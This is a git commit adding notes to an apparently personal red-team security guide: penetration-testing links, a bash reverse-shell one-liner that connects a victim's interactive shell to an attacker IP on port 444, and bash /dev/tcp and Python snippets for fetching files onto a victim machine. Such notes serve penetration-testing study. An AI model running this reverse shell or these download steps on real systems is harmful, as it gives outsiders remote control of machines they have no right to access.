Added reverse shell, downloading content to security red team guide

rezen · Sep 6, 2017 · 06210e1 · 06210e1
1 parent f0ad2d6
commit 06210e1
Showing 1 changed file with 28 additions and 1 deletion.
diff --git a/security-red-team.md b/security-red-team.md
@@ -9,4 +9,31 @@
 - http://seclist.us/pyjenkinstoolkit-is-a-jenkins-penetration-test-toolkit.html
 - https://pen-testing.sans.org/blog/2017/02/02/pen-test-poster-white-board-bash-bashs-built-in-netcat-client
 - https://www.pentesterlab.com/exercises/play_xxe/course
-- https://www.hackthissite.org/
+- https://www.hackthissite.org/
+- https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/
+- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+- https://tools.kali.org/information-gathering/enum4linux
+
+
+### Reverse Shell
+```shell
+# Reverse shell with your attacking box is listening on port 444
+/bin/bash -i > /dev/tcp/64.228.93.35/444 0<&1 2>&1 
+```
+
+### Download Files
+You may not always have `curl` or `wget` available to download files on the victim machine.
+
+```shell
+exec 3<>/dev/tcp/ahermosilla.com/80
+echo -e "GET / HTTP/1.1\r\nHost: ahermosilla.com\r\nConnection: close\r\n\r\n" >&3
+cat <&3
+
+# Python 3.x
+python -c 'import urllib.request; urllib.request.urlopen("http://example.com/").read()'
+
+# Python 2.7
+python -c 'import urllib2; print urllib2.urlopen("http://example.com/").read()'
+```
+- https://stackoverflow.com/questions/645312/what-is-the-quickest-way-to-http-get-in-python
+- http://xmodulo.com/tcp-udp-socket-bash-shell.html